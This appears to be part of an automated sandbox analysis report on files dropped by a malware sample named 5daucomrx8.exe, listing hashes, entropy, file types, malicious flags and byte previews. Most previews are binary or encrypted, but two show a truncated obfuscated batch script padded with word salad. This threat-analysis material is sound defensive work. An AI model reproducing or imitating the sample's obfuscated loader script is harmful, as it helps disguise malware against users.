                            Preview:.H$......K..bb.`&.!<t....|..6l.T.:.?.Z.......,p,...i.K......Zk..%...kx....78..wcvv.V.N.o..._.(B.#..{.........^.$u6..Y..o......F<...C. ......"f.h{.\.3)....c.FZ..x< ..k.m/M.:.)...Q..."(m4@e....r..F..lv..-..../..(.l5.....>.H......[.r%..Fl..4.O`I.K..l..L..F..r.*.q..b).3E.&..X$2I.&C........n......b.Y....i\..c.......">....#...../}.K.....j.D..2+...7-.v..Nv.X..M..""4.M.9r.[.n...p..?.coM.......A....\4.....hS. .~....]k...Y.m....Q.J..b../~.X5.b..n..g*...k..%~.H..B..c..q,.....".C......_`X..9..@..I.f..A....3.].m.a..>?......:.........P...PG..]..e....&.i.|.n..ah..7..4;..L./.....G..."...-.....<..2..v(&W..d....#Ph........BG)..a..:J!.....R..stH..B....T.........O=.....Q*..l4......v0D...Mt~*.{.H....|..:..;w...>.G..E..bj.(~...j.*d.Y...FFFL......Ix..~.....ih..P...Zi..(.....P..).x*w6...;m.K%d.Y.v.8..s.f..X........Cj...pp.C.:x..]Q.Z.(.p....._..7&..A.#<..0.0..:C...@..d...x.bkzI.,...@.......x..l.^.c||..v{.....j..'&&x.I.X.5).z....J...7U..........f$0J......L..xq..#.}..E3.
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):29696
                            Entropy (8bit):6.542041223780247
                            Encrypted:false
                            SSDEEP:768:sgckS9cAXKOd+3Avgmy/bJCVKSb279sAOOWNu:s/tcATs3AS/4KS+9sAOa
                            MD5:E599A7F1BA05A669849EE5C4D2657057
                            SHA1:84176DEDF0F3886EB8AB41846A4FF5334CFF844D
                            SHA-256:5224518DDE347FD8DB57CAA13D4B502859BCF911D40D90291A67B4E9942D59FD
                            SHA-512:C25657D8F4389D76CE3974D869A26EB221F24A2E9C1AFAA1E44546C7053757D7D3B03976CBA9B2714E2D292BDCEBAFC5690E0662C0A1F4B018EDD49EC36C739F
                            Malicious:false
                            Preview:.......M......6...].j......E..F.j..E.....j..E.[S........E.SPW......j........Y.....y.........F....._^..[..].y..u....@..3..U..y..u....E......J..H..J..H..J..H......M.h..I.....E.]...U..VW...6...j..G......~.....Y..t....a.....3..E..7_.F.^]...U...8SVW.}...]...... ..u.2../.....@..t..G..8......}..t.......3...P................E...~..w....6........v.Ou.}.j..3......3YYj.XP..E........H..p..M...O...%....=......9...=......"...=..........=......,............E.PW..@.I.f.M.3....C......wS...,.F..$...F..E.PW..(.I..........M.V.u.V.....P........W..$.I.........]....E............@.........E......E.PW..(.I..........e...........}.j.....Y..t.. ..`...X...3..M.U.....@..f.M......t.W.u..E.f.M.P.&..........f..f.E.E..E.M.E.P.E.........E..}.@.E.;.|..J....E.PW..(.I.3.C....>....e......+....e...}.j..3...Y..t.. ..`...X...3..U.....@..f.E.E..E.E.E...P.p....E..G;.|.......E.PW..(.I.3.C.........e...........}.j.....Y..t.. ..`...X...3..M.j....Xf.E.E.....E.E...P.....G;.|..m.]...&....4....E.PW..(.I.3.
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:OpenPGP Public Key
                            Category:dropped
                            Size (bytes):203776
                            Entropy (8bit):7.999016074472303
                            Encrypted:true
                            SSDEEP:6144:H6QNJ4nbgSiR+ZjmxwRd+gV3dBwc8f8Hno/MG:vJ4HiR+usdBwth/MG
                            MD5:82A2EEC72B87B87BA9DD721BE71A6731
                            SHA1:A36C87743A61C1496EE55AF68D0845961DBA1BE2
                            SHA-256:5E9D5F9719BA700F9331886B257E5CE074DDF8B07BFD097183D990833AFB208D
                            SHA-512:0F5E57AC362340EAFA7BB2A1A52C89537A2225A6902B0020ED96A4782B17EB82552AA8D636C973B0C53171DBB4C28AE5B743C03DC25C57B5EFD4A83BC80F1CF0
                            Malicious:true
                            Preview:...,.7b..[8{JHz././4...@. <[...2.6...l{.G......6Y2.b.<...V...UV...m..Q[.#?.U.|..j'..x.l"*T...P..Jb..Eq...)w..S[...W3..M......5.0^.......)..E......o.......U..h.aV......s.V......@&W=...Q...[...7.<.]...m...%W......k../.=.....)........4F...`..u.%P8bWnu..gTY..LJ$.<-..P...r..;...2.R..f....i..A..*.......r%.).].v[.9.u...UO....T~..$.....xC..O.>...<..wY;x~..I.{N.*ya..\..S..)]S.0%...h.`g,..[-.h3E3.^<..1.Kp.<....sNq..M..6...)..D./d....(..q44....$SP3*........S.Y.Cp.......m..A....Y...h.F....@..h.|../d.(W.....N...~.!7..0..y..5E..&...!........U....0..Qv..*..eT.|.(-.1 ...,..nTbN...M.x...=.%.q..{...}.A.[.F.....". ..6..m..(.@Ja.v....5f....l.S.,.2>....i.."..x..$..~.;.D@D.>ZW..F.?C.F5.......W.. .[..../.(..XM5.r.`=NJ..Y.D...I.0.Pd]o.k.2.F...Y..G/.'.4..(.8. .5.k?1U..T....*?Tr......'..Ii.R..T.5...z...T.....3.aF.o.i..PB... .+.]..xUd....T.8....^....K2..4..{...r..%..;=.+lV.)d.{.Xm.i.d...rc.;g..q..=.VI....BP.&zX...g.K..~.{....v$.qca.wPSH-.J......3.cj..i...0<......
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):43008
                            Entropy (8bit):6.513834863558758
                            Encrypted:false
                            SSDEEP:768:c4ypQ9Fsqib9futLZzWaIxyKw7nxZL96Yk4iARefFilP4Bwh1QwTMvcVPDl:9yy9FskzWaIxOv/pAfkF/bIQJ
                            MD5:0653D5B9F678E342AC539C35C588F8F8
                            SHA1:164512131FF6E3985D44A01804A1FDDDCAF6BFD5
                            SHA-256:D49CEB2DB490B316AA89C83CB694758604EFC348445B3F61ACDD5413780466CD
                            SHA-512:28B34858973AC560B1FFFC8A0B928A25CD11CF19FE755A3F28F68EDD88C3FEF3C994AF6D5E2DC093D5EDDA1D2669F028086B9B4E94D0502946D8AC2F82EA8CB9
                            Malicious:false
                            Preview:...i..Q.F9.....I...i..R..j.Q..T.I...i...~8....i..WQ....I..u......i...u...gL...d......hL...i...u...gL..d......hL...j....hL..u........(..R.....hL...j..j.j.j.PWj...D.I..E...u..M.....j..M..E.Qj.PW....I....E..E.jP3.PPj.WP..D.I..E...u..M.j.P.E.P...PW....I..E..M..=<.I...t(Qj.h.....u.....I..~ .t..v ..E..F .M..E...t(Pj.h.....u.....I..~$.t..v$..E..F$.M..E..}.....Ui......#..Ji..j.j..u...X.I..ti....)..............Q.........j..j.^;......................i........j..D$........Ph..............I..D$...........b....Ct......H@..t........f;D$.t..PQ....I.9............Ct...................<.............:.u........t.V...h......:.v.........Ct............ug.......f..x[.......f..xOf;.~JH.D$8....f.......Kt.............D$L.D$8P............P.D$.h=.............I.F;.......1...........L$..t$.;.u.;.....t....D$..............;.~.IQV..........................ah........;.|,...Ct.......t........u.W...g..O;.}.|$..L$..T$.3................................7..<.I...@....g...w@....I...g.............g..9E....g..
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:ASCII text, with very long lines (1341), with CRLF line terminators
                            Category:dropped
                            Size (bytes):17805
                            Entropy (8bit):5.067129531655874
                            Encrypted:false
                            SSDEEP:384:c2HgCk/+61O1xLW6KCDR/1eKCRagtGbqadxfpYTk96afqirXNq:rd1xLW6L/IK1gqqad9p3Uafqyq
                            MD5:E1B45CCFF8C4F9B3F37B9BE092E5FC81
                            SHA1:69E30F418DAD45C89C119DB58E023F90952B3C12
                            SHA-256:FB199496184C801EEA454E0534DEC3CE932573892155FD8DD79EFBD4AA734B4B
                            SHA-512:C507BD87B190AE0CFCA5A9FBF6C7AEC464165F67DF2BEC5518D8EDF7F26A0014A4E642042EA7A2685DD4D22D5821BD749E8F7A817EF81CBF61C340D982323D2B
                            Malicious:false
                            Preview:Set Guide= ..bnBundle Device ..dFAiLithuania Movers Convergence Finances ..NpYNMustang Dice Luxembourg Tribe Saudi ..GzSelections Reader Merchants Worcester ..MzjMAf Australia Sheet Employees Communist Airport ..NXRDesigners Humans Schools Lazy Stronger ..HlHey Preserve Deaf Batman Film ..YEdFLlc Hugo Glory Remaining Injuries ..Set Salvador=a..UpCMany Surface Math Elegant Roster Jon Aj ..MwgExtra Spare ..XnrZFilms Espn Algorithm Silence ..eeDiffer ..fgActivists Pressed Costa Segment Headlines Confidential Brings Enabled ..PmCult Hell ..eqTComputed Boats Fashion Dave Spy Recruiting Designed Reality ..XgvYellow Egypt Exception Cell Licensing Choir Attorneys ..UigBPhillips Slow Oriental Hughes Aim ..cnRomania ..Set Point=i..ronFixes Sec Flexible Reputation Chuck Two Biology ..CRQEnhancing Vision Assistance Publicly Ending Babes Holocaust Blade Zinc ..wqgUPartners Powder Centre Bill Thumbs ..lPmSeal Laser ..BXmcLafayette Sculpture Shoot Occupational Reproductive Automotive ..MzJvFavors Jew
                            Process:C:\Windows\SysWOW64\cmd.exe
                            File Type:ASCII text, with very long lines (1341), with CRLF line terminators
                            Category:dropped
                            Size (bytes):17805
                            Entropy (8bit):5.067129531655874
                            Encrypted:false
                            SSDEEP:384:c2HgCk/+61O1xLW6KCDR/1eKCRagtGbqadxfpYTk96afqirXNq:rd1xLW6L/IK1gqqad9p3Uafqyq
                            MD5:E1B45CCFF8C4F9B3F37B9BE092E5FC81
                            SHA1:69E30F418DAD45C89C119DB58E023F90952B3C12
                            SHA-256:FB199496184C801EEA454E0534DEC3CE932573892155FD8DD79EFBD4AA734B4B
                            SHA-512:C507BD87B190AE0CFCA5A9FBF6C7AEC464165F67DF2BEC5518D8EDF7F26A0014A4E642042EA7A2685DD4D22D5821BD749E8F7A817EF81CBF61C340D982323D2B
                            Malicious:false
                            Preview:Set Guide= ..bnBundle Device ..dFAiLithuania Movers Convergence Finances ..NpYNMustang Dice Luxembourg Tribe Saudi ..GzSelections Reader Merchants Worcester ..MzjMAf Australia Sheet Employees Communist Airport ..NXRDesigners Humans Schools Lazy Stronger ..HlHey Preserve Deaf Batman Film ..YEdFLlc Hugo Glory Remaining Injuries ..Set Salvador=a..UpCMany Surface Math Elegant Roster Jon Aj ..MwgExtra Spare ..XnrZFilms Espn Algorithm Silence ..eeDiffer ..fgActivists Pressed Costa Segment Headlines Confidential Brings Enabled ..PmCult Hell ..eqTComputed Boats Fashion Dave Spy Recruiting Designed Reality ..XgvYellow Egypt Exception Cell Licensing Choir Attorneys ..UigBPhillips Slow Oriental Hughes Aim ..cnRomania ..Set Point=i..ronFixes Sec Flexible Reputation Chuck Two Biology ..CRQEnhancing Vision Assistance Publicly Ending Babes Holocaust Blade Zinc ..wqgUPartners Powder Centre Bill Thumbs ..lPmSeal Laser ..BXmcLafayette Sculpture Shoot Occupational Reproductive Automotive ..MzJvFavors Jew
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):198656
                            Entropy (8bit):7.999173317848576
                            Encrypted:true
                            SSDEEP:6144:suCQ3s8VJwgcSoNfAXamj3rIKbawOjtFkmwTJ:s2s8V+lN03rI3Gx1
                            MD5:84C31C7B0C8D4DF12F022A32DED12AA2
                            SHA1:DC5CA7CBAB70171827B0E979CAB55388E5BF6442
                            SHA-256:86EA718EECEA2F320F22AA87FE6F11D6DD582D70506F8D53F711324C38227DDB
                            SHA-512:B82B3213BBB01EE4587CBB157B2A6974177560789710E6E59FCB652990C5C169D2FE0AF3053D971B6CBD0BB3812E64FFA1CF697F0556D5A4D6E69998ED0A902B
                            Malicious:true
                            Preview:.Z.Ai....H.b..W.BS.........Q h...>{.a[..J._ZZ{..W..-..(...S6.........'B.......,.s.L...'D.5.`...3.o.U.hl....|A0.<N\...@..R.>..3.b$....z.........[S.l....%.T.4.D...0.q{.5....o..'.vc.^7....`.f.....k...5A....2..)......Q....$..#;_.`.......8!.0.u|..99....\T....2.r=.i...$7...=.....b,...fSe..U.;F...~_Qg.<.....iT.......A....JC...`....eH.@]bh..Ms......=.x....Y...H".H......N..(..;&.PU...v...d<..Q....z`1oN(f(.&8..\.....=.y...hi;U._n..n.>.G..xa...(%.uY.(.f.....v..T.K..F&.6-.z{....n...k..0..N..ZtG .=.....}.$~...)...{./...u{.....a..._..h;p.4............f(r....;....He...r.&Q[.9........4h.,..;*....i../m.O&.J.t.G..j......y....EC...:......>\....8.O^..t....R.....g..}.1.../.g.H...V.....G...bH.\....of...2w....M|!.3....}..z..DQNq@..7.d~)=..DCb=.v.I....]K+.r....Th$...._.......}..!.GE'...o.NcNXcV7x...~.....g.+.I.....:.a....*?..~M..?...u.iY.W..$.......g..-.E5.......-..W.i..z}%|@..`wG.....A...$...zL..p.X5h-5.q..p`.U.L){......%...8...l..^F[....k.nZ}.X...n.n...'.!\
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):62464
                            Entropy (8bit):6.704844761239483
                            Encrypted:false
                            SSDEEP:1536:PhrNCsGJh5yA05E22VelTXzSj9xb7XDh1RlyxcZqvinN8p:ZlAYrlTGj91DhrlyU8p
                            MD5:E9616A6147473B1C11D5997AF70AA41D
                            SHA1:26D9932473118C39D788C20DBCD4EDFFCB2E195D
                            SHA-256:3AAD09EB2199702AC0845A37A25AEAE969CA90438C97D0556AAD8E1C2489093D
                            SHA-512:C985B09EB8D0D0E9404E80F67A670409AE8F4B92F36F6A32F08A8189FC9E34FE7EA3A6AB2C53E47F6054CBACA330324C6A3951522CE98E768F055D13FEC0D3E8
                            Malicious:false
                            Preview:.........$...FD.......$....&..;~|...&...~.....&...~.....%....F4;....%...Fh.............s.....%......o....U.;U....$...N|;........E...uT.V...t.j..F.PQ..............S$...,.V....+.;.w f..f;F4u......3$..f.G.f;F6..%$...E.U....................$...D..............;~|.......~.........~..........F4;........Fh........................w4t......t....A.......#...2;~|..]...f.?...S.......K.........t............g#...~l...]#...%.........w<..J#........w...<#.......3#.... ..*#................#........._ ..w/...#..... ........... ....."..../ .....".........0....."............w<............w...}........t..... ..."...f............"...U....._ ..w/..G...... ....n"..... ..../...../ ....V"..........0....E".............w...2"................ ".........( ..........) .....".............w........A.......!..................!...................FD.......!...}.........!...FD.......!...b......wZ.FD.......!...K........r!...FD......e!...0......w(.FD......N!............@!...FD......3!...E.B@.U.P.u....V.u..u..y........
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):29696
                            Entropy (8bit):6.429381666176089
                            Encrypted:false
                            SSDEEP:768:JFR97T98+sDkXLAlMoLVNIo8DJWxWWbP75qcD:JFTR7bAlHL/4aj5VD
                            MD5:35D5F58D663AF5854AF8B15634FADFCF
                            SHA1:0D918B8ECA29301C4CD8BE1764F96BF779D6622D
                            SHA-256:B87A61A0D630FA8EE70C61BA1E4F38A8ED4EE4B592BC900E826EB5CDB9CA64DD
                            SHA-512:0184DD2AEE63324BEE5FF0FBAA4123382B6DE48F88E3E8A7FC63E59066A3D4C4650E68400994D046DB1FD1F691F51212616E7DF4AC51A704F15050B174A6490E
                            Malicious:true
                            Preview:_....F|.U.+...;...S...........f..Of.........].U.f;...................S..U....E.;F........N..U....E.D...E.F.+E......E.......E.......E.E.+Fx.......I.........K....E..M.@P.u....V.u....@dJ..u...C................m..... .............6....._^[..]._^3.[..].O.........i...........,dJ.... dJ..E..U.}..u..E.......;....}.]..............t.......M..........}.;U........................E...@..P.u.V.u..u..........}.........}.................d$..U.;U...2....N|;...~....}..u(.V.....-....u.F.PQ..................U.........%....=......1....E.....F.................E.B@.U.P.u....V.u..u.............~....^.....b............\.A..$.T.A..B.....]..........U..E........ dJ..M....,dJ..E..M..................E........$.....E.......M.;F|...........%....=.....................................M..........}.........E...}.@P.u...V.u..u.........................$........C.f.<Cw..Ct.]..I....E.....M.@P.u...V.u..u.............>....-i.........M..E......E.E.@P.u....V.u....@dJ..u...C.......... ............
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):147456
                            Entropy (8bit):7.998923137857825
                            Encrypted:true
                            SSDEEP:3072:HlYKLVe9n25kVLIV1GWWKnqX+xhURTwcXCIDv4D7vZsSx4EDpbdE6:HlYgUVIV1GhoEoKFwcSIDve7RsSCEDpB
                            MD5:6876D6C44BAD4FBFC21325B46B63484C
                            SHA1:9A37D6D6D4E7178A6FD840DB172184BDFF67B15F
                            SHA-256:3A97464DF93B328E7F78CD32C3734B67B41F3808B8C645846EEFC30CCCADDB7E
                            SHA-512:10D4634A6226320C85A5519C798258B6F0A27646817309549C624FFD44F82BE04413F8BC87E6935272852FA8EA695FE92668B59A7E223259525259A0393D4E51
                            Malicious:true
                            Preview:..F... ..$z2!...sU.![..Z...0.@R...}<..1...1..Z|.fI.%...-.>...+.."N.d.=.(\.8\E.@.*.\R"+S..g!.g.../.l4...],..e_...Vb...B.7T.e9@*%.E....w+?0$v#D..$...1..#...h4P.x+....c..C.MI.....>.........E]..b...S.......M...M..h]......"..6:....7=.Kq.*.E/w<..f9 GS..[/.uC.e....N&..A.4.:......r....a..-.wvv....s.._.....k..v.].7Z.@Z.S.:.I+..f4K......(.e=.7.....5..|O@.^....z)...A.pS..-....x..Ne.1...w...1.'N...5.&....pf^3[.....\.c..o.....D..(..P..o.4..o...-q..~{...V0.{.xW..e..M..a......yrf.....w.r......i.......9X.3.E...g<y..%..S.`....h...Y_.....3...t1...\.cf.O..J.`...y..#.Q..wJ.~`.40a.D{Q...=*Q..f%......&...._.k...?.a?.W....J..g..vDx..l......%.R.C*..... .N1.{..c.G....].c..<..[.+_..Nib&....e~1.\~.RN......%.......t.y....N.. . .....H.-t?.(MgnW9.A......S......g...L........~Rq....6..]...s. .iB.?.`%......#?...5.Ah@.$...}..m.r3...Gm.f2;f..1...._.6)....d. ..~..em.;..r.....o....U..5.R..M."u...I....B5d..u........\."..s..... ....w...7....z.*.'.S+...p;A9.&..Bt...9U..v.l]Wo.a.X.S
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):6.193659885817098
                            Encrypted:false
                            SSDEEP:96:Y63b/WPJonc1yGu8B3E8CoCMS2d/Xcyetj3sTSo59X5OqsW:N3LWMch9B0ze/syedEXAqH
                            MD5:D41AD902B6AEEABC9DF8D5EB457D56FF
                            SHA1:E65E181C4957CC6536AF3918CFAB9C4790DD9DB9
                            SHA-256:DA4B25CB663E611C0F10233467FD9BF43A528CACE938DF16C04D4DDECB19F916
                            SHA-512:08596C48EF2253D0A1E81A2EAD4D575CAA6B1A76570BA733FB88AEF0768BC9F6120CB25047C68CCA431A05457C78FE8EF58FF75BE49EF28BB54392687E1D2A9B
                            Malicious:false
                            Preview:^3.[..]...U..SV.u.WV....}..3..CS.|......Um...F..p....8\........j..v..5.......Cm.._^3.[]...U..Q...SVW.13.N.M.x@..>.+....S..o...0.u..`E..YY..x.~..{..M.;.~.;....._^[..]....s.......U..VW.....O..@........u........F.P.`...F.P........*...F(.............F,.......v0.S....F4..,..........F8P.*..........FH..<....FL..@....FP..H...t..FT........Q........<..._^]...U...8VWjX.......Y.......................N.........P.._........P.N..(*.........N8.F(.......F,.........F0.......F4..,...P..)....<....M.FH..@....FL..H....FP.......FT."...P...O..@....q....M...Z...M...Z.._..^..].3..J...U..QS3.V.u....P.H....<....t.I...dL..@...f9X.u..8!t...t.^3.[Y].......U...hSVW.M.....3..E..I..E.M..E....E.E.E.E..}...H.E..}....]..u.jHY.S....E..........@.f;........E.@....E..f.....j.......f.x.3...j...0.M..(...E.3...t".u.....U..Q....u.G;.r.u..]..E.;....j...E.P.M..xX.......S....f.x.AuH.}..uB.A.3.........@.f..G..G...jH[f;.]...0...f;E.......f;E...*....G...}...........E..@.E.....@.f;E.......AjH_.....f9x..}..
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):64512
                            Entropy (8bit):6.549624693115074
                            Encrypted:false
                            SSDEEP:1536:TkdIlDbKffUCJ5h3FsoejQ1/9klkp5VLGW:TkuVKfPf3qoT1/Qkp5IW
                            MD5:A353180038BC0C56585D8B18BCD2D039
                            SHA1:0DCDF81CB067BACFF96E58423198B9D53A68AC4D
                            SHA-256:3BC8119C6931103ABD71E920A57AB160331201005BD379236240C499E6811D1E
                            SHA-512:E036630A140587DF95FCD97A654D3C4E68A6316C5457DD1342170409AC41DFC26E6EB9614A2E3192669E6BF9A50A1C203BE25A53A3054162D1D0BB64CB1D84A3
                            Malicious:false
                            Preview:L$<.D$..g.....D$...................;........D$8P.L$...&..h..K..L$...'...D$..L$x+.N@VP.D$@P.>#...D$xP.L$..&.....K..L$.V.'..Vj..?T..YY....S...V.L$..'..3.F9t$.v&V.L$..$..f.8|u.V.L$..$..3.f..F;t$.r.}..r..G..H.....D$$h.....k...YP.L$..Q...}..r5.G..p....n[...F..t$..0V.D=..YY....j.j..H....,}........t$.3.f..jX..$....j.P.5=...D$0....}....$.....D$...$.....D$4..$.....D$(..$..........$....X....$..........$.....$......I........G..H..]......u.G..H..]....xf.G..H..]....t.....G..H..~]....t.... ...G..H..i]....t........G..H..T]....t........G..H..?]....t........}....$......$....P..........I...........$.................':..Y..$.....L$\....&....$.......3..2P..:...L$\..$..K....%....$.....L$\.%....$.........p..$....f9.u..M..D$XP.[...L$X..)...,....I...t...$.....M...[....3.P..j..H....={...D$...u.P....Y.t$.....Y.D$0..u.P....Y.t$,....Y.L$8.(...L$..(...L$h.(...L$H.(...L$x.|(.._^3.[..]...U...\...SVW.=..I.......P.u..M.2.......tq......h..I.P..B..YY..tH......h..K.P..B..YY..t1......P....I...
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):34816
                            Entropy (8bit):6.665252092241425
                            Encrypted:false
                            SSDEEP:768:5IDJ0vLyktlgwYtfKUGabl8UvrcyzJsDXtk:5sJitgXKUvl8UTcyzJWu
                            MD5:59391B69D439FC7599CCB7D333193250
                            SHA1:497BE4625681164C552963A2F02CDF18CF30EDC0
                            SHA-256:DB29B88D44504EA00B87EE4F177BB7837B17022AA82805F72FFAB6A9F4929717
                            SHA-512:E386B1A96734534A949988574F8BC2D957529E52EF61BD938142E9663C97DFC0A5CF22FF27B817BAC75A386E360A7CEDF5CCC877CD1BFCF006A25F22AF634619
                            Malicious:false
                            Preview:t....N@..t.Q....f@..N(.FL......G..V.:..Y_..^...U..E...$P..P.I.]...U.........SVW....$.....|$\.G(..$.....G,..$.....G0..$.....G4..$.......E.P.B...E..L$`..$.....@..D$...D...O<.D$`P..}.....L$`.t$<.%G..3........8^ ..g....O<.F..\$D.......v...Y...T$.......D$...j..L$ ...D$d..I..\$h.\$l.\$p^.\$(.\$0.D$4.....D$x.,I..\$|..$......$.....D$L..I..D$ .D$P.\$T.\$X.D$tG....D$@H....D$H@....D$<;H.|.;........\$.;H........L$..A..D$$...f9X.uO.I..L$..D..f.x.3t...D$......;...(....L$.....8$u..D$.....8........D$$F...f9X.t..D$$F...f.x.Au3.|$$..F.....@.f;D$tu.A..f;D$@u.Ix...f;D$Hu..u.|$\9T$D}..E..L$.........L$(P.g......L$(.v...\$(.D$4.....D$.P.L$|....D$(P.L$d.....L$D.l$..A.T$.F.L$D......p..a...D$<j.^.D$......x....B....D$d.D$ .L$..\$..I..L$.......8$t..8.u.......D$.F...f9X.t.3..........G.\$......@.f;D$tu.A.~f;D$@ulIyt.D$Dj..|$(.|$`[9D$.~h.O<.F..D$..D$$..P.D$,P.D$ P.t$..{...........D$..L$L.@.....0.Kt...D$.j......P.D$0P.8f;D$Hu...t.G....h....D$..L$L....0..t...D$.j......P.D$(.0.D$..@.....0..a...D$$.T$
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):129024
                            Entropy (8bit):7.998834022130344
                            Encrypted:true
                            SSDEEP:3072:ID7ENq/W4iLe+KHHdF4aUDTTbxD26RIp5yYY8a2/Fvn9PuiojJe:IDkq/W4iLcHHUaUDTvB22i5yY82LPt/
                            MD5:39B3BEE454F0BF8C20FA9D852BF08493
                            SHA1:811D50772A534D58584DC59E186CD234FF7CEEAF
                            SHA-256:895AF83CCDD17BBF71E3491C2E1580DA75735A69698A586762552066C4D5BE4D
                            SHA-512:78AC7BB6EF711D04BBDB4E60EBA41F0F4655BA13DD8720A354853DD66D4F12A6FEC32093A491D0380C2279C4ACFFF3A482F8961F8F0DBC201C630B9F11699AB9
                            Malicious:true
                            Preview:.L....?..R3...^f..g+1.....\p..tFN?.{..Bx...Btz......,.L..s..~...T:R?}F.T9..#..i....ph.-N..C......3.I..$J...A. 6.%.......H..8n.D...y.u...~..4....m.....U.."1..Xg[.sQ<..7.l..-J!..X3'..o.]...D....v.]......\.T}.n~...rq.Sy...m.}D.I`.<.'......?.e.......V..........y@.P...@.%..LQV...Q;4.....5....jX/V.c.....zh...r.J.L=~Q)a..P.h`....yXp`."Tsl...=..k.c..!.Y1.....575.t.R.i....(......vV..7....a...^$2.>.../.z...y........B\.......q.1pV^.R:_KO4.Ib.."......n-tv.A..E......m{Q.#.K.%)...n0T.J..G..W.Y..g.T.V(...b..]8..G.....u.UZ...kA.......%......62e...7C...+...'.Sy....5-\.n.y. ...?......6GN. P....o...2M.Z.`em.........{n..7V.....q.5..@\`.WZ.',I@.W..*.......gV..y.....^a. .....o.?x.b..r.o..G.K. .U!..8."jR,...+..S.8....!.....[...].#.......+.)./&.......C.{.,.3..h...g._Y.N.K.Y&.+..y..k...h....r.>n..c....B.5g....m\Ff.O.=Z......u<.....n....,Q...S...6..a...[..Fb.V.HD...\x&..qt""X#....>.......x...,.._=K..R.96..B:.W.KZdu}YN>.6.6_....g.[^.B...U...-..;..k.N..!b...F9....$.L
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):98304
                            Entropy (8bit):7.9982963129133156
                            Encrypted:true
                            SSDEEP:1536:sen7o747R/unr+gsSac1Sr9lVKz3i1Pq3wkpR45Vv58BpYviyP5TlxqkuQ37V5Ek:P7c4V/O+g0c1mv6y1Pq3rb4fiBGjBukh
                            MD5:77B0DEDD52B512CEA8C5CFC3E03125C0
                            SHA1:E73DF32202E72E667994BA0E16D730F452B446D2
                            SHA-256:598AF1825F5038A77F75014D31A737C61A3577B8AA7C2CE0AD26487C504A3D75
                            SHA-512:0FE49732697F300A8CA84517BBC2D7C043263111F26A392880EAF8114CBBE33F8045B5297943E89577CB65C7609D4BE5A0BEA318C049678F7E0E3F3EE598261A
                            Malicious:true
                            Preview:.D.....:...]...3#:.E....5'd.j`............pbH........a..J..7...9.B....\.Z....W#..n.)Hz5\.ZG..r.`...M....&.....S."]..s.I.1;....`?..Y%.......]I...Z..F.Z%...IB #.a.F<.m.Q...#.2.T.0m..,...*...F.......r...-........~....k../9.. .F .x.......~..{....^...Q{.G.D.M.$..*.....5qj...L.k.BW.....?..s...xC..6..P..c.7...UC..<\..)@(Q.5.n\,.i+.....7.H.._...@.lZ..Q..y.-...w..x..+..|..1.J\.%6....E..._./.W,..2T.........!.......{wt.+......s.....4...F.bU...k..=2N.\...&.zJ@4.l...y.....xR.^J......f.&..W..8..Ka...[c.....gu.....p..W....#u..e...}...:u.@...x(r....k...7.....@...3.E.^D...&g.!.%.......9.See.../S.b...PXRO.XK.G.m.p(..W.e....6.n@I...W.j;...!l'....A....8..+v......7{_.Y.'V..|...6.B.<...7J.vX9n..r^.S.q..u....g...."r.{.,cMtY...".).|..~).@...-.....3-~.....N..@G..Q.BS.}...U.....K.5.].,.o..9,..%.3..m..t.t...|=.nR_@A\..!@...|.K.r.flD.......F...5S.8..|ml....H.p.6.<.5........\...L.h......Z...(.7...&YDKqs..T.V....[..u.].w'..@.\..gV...9...(.....Q.8p>.\..4e.S.....=..'...
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):16384
                            Entropy (8bit):7.166072462000539
                            Encrypted:false
                            SSDEEP:384:5kXDylnffltltZZzz11ppz9KvLoXM4INduLbbOxiVnoXM4INduLbbOxidDQxq:5dK8M4INduPbOUGM4INduPbOU+q
                            MD5:567BA9CE87CE234A38F42A10967EB55E
                            SHA1:8730552D2CB7357B49279B25B34D4EBBF8834184
                            SHA-256:DFB3AEB55AF835CBEA30F3595E2845236B45305F73C7CE06A9B8E9E53329EC45
                            SHA-512:BC7579FD1827127791F7FBDA3C71E46638D58D2F4E6EC0F9B20B64598EB7363CA9632289364FB3D6E56DE2670A440E1E1550638C61149884D30AFACB1B82414A
                            Malicious:false
                            Preview:.cC<-.a`.N..y.....n<.<........z..v<'*6.....*(...<.,.v..........<.O.V+4.......5.<.'.6Go...T...c.<)TH.....5.d+.2.<H!..o........<.U:.~$....s...<$"U.8b..qU..M..<.;.f.....G..+.<..e<......o . .<s_..u......."a.<.gBV._.....F.D.<...s....Ul...e<bN.6.....g.....<..L..%.........<.D..h....../..<.*B...D_.Y..{<6w......<(...`.<...77...b. ..<ON..}..'.+..q<.........X4m.<d.]{f.......|'.<\%>..U...Zsn.i.<..yUk....3.w..<..Z.......-.f$.<..O..3.........<F^..v....._...t<..K........0.ns<.R......Y....<K.W..g..h..l,kg<i... ......6.p.<{..J-.....=...t<.....X......PZ.<.2.......J.s..<^.{3.....:`..t<.?...P..&I..'o.<........ .A..<'Za.......1.d.<@En[vP....M;.w<..............?.........9..B..@...2b....................................0<..0<.dW..dW................................@.......................................B.......B.................8..B..?0g.W..=.......................................?.......?......................0C......0C................................U....I.?.. ....u}.M.U..UUU
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):16384
                            Entropy (8bit):6.604564417541617
                            Encrypted:false
